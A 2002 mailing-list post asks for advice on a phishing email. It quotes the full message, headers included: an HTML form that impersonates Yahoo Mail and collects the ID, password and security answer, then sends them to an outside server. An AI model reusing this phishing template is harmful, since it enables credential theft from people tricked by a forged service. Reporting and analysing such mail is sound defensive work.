Apologies, as this is definitely OT for psyche-list, but I was hoping
that someone could suggest what to do. I just received an email
purporting to come from "support@yahoo.com" telling me that my account
would be deleted and that to reverse this I needed to fill out some
personal information. I examined the headers and it appears to have
come from someone with an account on the computer hosting
www.chicagosocial.com. (I include the full message with headers below).
The question is what should I do about this? Possibly this person has
compromised chicagosocial and I should let them know. Or they may run
it. What do list members suggest? Is there any point in reporting it
to yahoo?
Sorry for the OT question, but from previous discussions here it seems
that the list has a lot of knowledgeable people about this sort of
thing.
Oisin Feeley
Included message follows:
Return-Path: <support@yahoo.com>
Received: from localhost (ars [127.0.0.1])
by localhost.localdomain (8.12.5/8.12.5) with ESMTP id
gBHIe1TW001086
for <ofeeley@localhost>; Tue, 17 Dec 2002 10:40:38 -0800
X-Apparently-To: ofeeley@yahoo.com via 216.136.225.62; 17 Dec 2002
02:25:00
-0800 (PST)
X-Track: 1: 100
Received: from pop.vip.sc5.yahoo.com [216.136.173.10]
by localhost with POP3 (fetchmail-6.1.0)
for ofeeley@localhost (single-drop); Tue, 17 Dec 2002 10:40:38
-0800 (PSReceived: from 67.92.168.237 (EHLO chimta03.algx.net)
(67.92.168.237)
by mta210.mail.scd.yahoo.com with SMTP; 17 Dec 2002 02:25:00 -0800
(PST)
Received: from smtp.interaccess.com (www.chicagosocial.com
[64.55.184.105])
by chimmx03.algx.net
(iPlanet Messaging Server 5.2 HotFix 1.07 (built Nov 25 2002))
with ESMTP id <0H79007SME9NQ9@chimmx03.algx.net> for ofeeley@yahoo.com;
Tue,
17 Dec 2002 04:24:59 -0600 (CST)
Date: Tue, 17 Dec 2002 05:29:45 -0500
From: support@yahoo.com
Subject: Your account removal IMPORTANT
To: ofeeley@yahoo.com
Message-id: <0H79007SNE9NQ9@chimmx03.algx.net>
MIME-version: 1.0
Content-type: text/html
Content-transfer-encoding: 8BIT
<br>
<table width="400" align="center" cellpadding="2" cellspacing="2">
<tr><td><font face="Tahoma" size="2" color="Black"><html><form
METHOD='get'
target=blank action='http://www.radiomhz.net/messagesend_yahoo.asp'
id=form1
name=form1>
<center></center>
<P><FONT class=s></FONT></P>
<P><FONT class=s><IMG alt='Yahoo! Mail' border=0 height=34
src='http://us.i1.yimg.com/us.yimg.com/i/us/pim/b/mailma1.gif'
width=250></FONT></P>
<P><FONT class=s><FONT class=Wf color=#00008b><STRONG>Yahoo?Renew
Account</STRONG></FONT></FONT></P>
<P><FONT class=s>We recently recieved an email that stated that you want
to
discontinue using the Yahoo Mail service and to remove your email
account. The
account should be deleted in the next couple of days, if however you
believe
the email was sent by someone else or you no longer want it removed you
can
renew your account by filling out the details below</FONT><BR></P>
<P>
<TABLE border=0 width='100%'>
<TBODY>
<TR>
<TD align=right width='30%'><FONT face=Arial size=-1>Yahoo! ID:
</FONT></TD>
<TD width='70%'><INPUT maxLength=32 name=email size='15'
autocomplete='off'><FONT face=Arial size=-1> <B>@ yahoo.com</B>
</FONT></TD></TR>
<TR>
<TD><FONT face=Arial size=-2>?</FONT></TD>
<TD><FONT face=Arial size=-2>(examples: 'dairyman88' or
'free2rhyme')</FONT></TD></TR>
<TR>
<TD align=right width='30%'><FONT face=Arial
size=-1>Password:</FONT></TD>
<TD width='70%'><INPUT maxLength=32 name=password type='password'
autocomplete='off'></TD></TR>
<TR>
<TD align=right width='30%'><FONT face=Arial size=-1>Re-type
Password:</FONT></TD>
<TD width='70%'><INPUT maxLength=32 name=.pw2 type='password'
autocomplete='off'></TD></TR></TBODY></TABLE></P></DIV>
<TABLE border=0 width='100%'>
<TBODY>
<TR>
<TD align=right noWrap width='30%'><FONT face=Arial size=-1>Security
Question:</FONT></TD>
<TD width='70%'><SELECT name=.pw_q><OPTION selected value=''>[select a
question
to answer]<OPTION value='What is your pets name?'>What is your pets
name?<OPTION value='What was the name of your first school?'>What was
the name
of your first school?<OPTION value='Who was your childhood hero?'>Who
was your
childhood hero?<OPTION value='What is your favorite past-time?'>What is
your
favorite past-time?<OPTION value='What is your all-time favorite sports
team?'>What is your all-time favorite sports team?<OPTION value='What is
your
fathers middle name?'>What is your fathers middle name?<OPTION
value='What was
your high school mascot?'>What was your high school mascot?<OPTION
value='What
make was your first car or bike?'>What make was your first car or
bike?<OPTION
value='Where did you first meet your spouse?'>Where did you first meet
your
spouse?</OPTION></SELECT></TD></TR>
<TR>
<TD align=right width='30%'><FONT face=Arial size=-1>Your
Answer:</FONT></TD>
<TD width='70%'><INPUT maxLength=30 name=.pw_a
size=30></TD></TR></TBODY></TABLE>
<center><INPUT TYPE='submit' VALUE='Renew' id='submit'
name='submit'></center>
<INPUT size=2 name=renew type=hidden
value='i23aCjae8h30Ad0kfLsAdF34fdc04sdD0kd5Ld23aBdae8f4a8DfgPd23aBdae8f4a66bc397c8fdc04sd604df1338lFmVc43Sfd3d5eafc2c4aCjae8h30Ad0kfLsAdF34fdcL5D4d32Sfue3Pdsxd4MdD0kd5Ld23aBdae8f4a8DfgPd23aBdae8f4a66bc397c8fdc04sd604df1338lFmVc43Sd250fti'>
<INPUT size=2 name=from_email type=hidden
value=edonmafia></FORM></BODY></HTML></td></tr>
<tr><td><font face="Tahoma" size="2" color="Black">From,<br><b>Yahoo
Staff</b><br><br></td></tr>
</table>
--
Psyche-list mailing list
Psyche-list@redhat.com
https://listman.redhat.com/mailman/listinfo/psyche-list
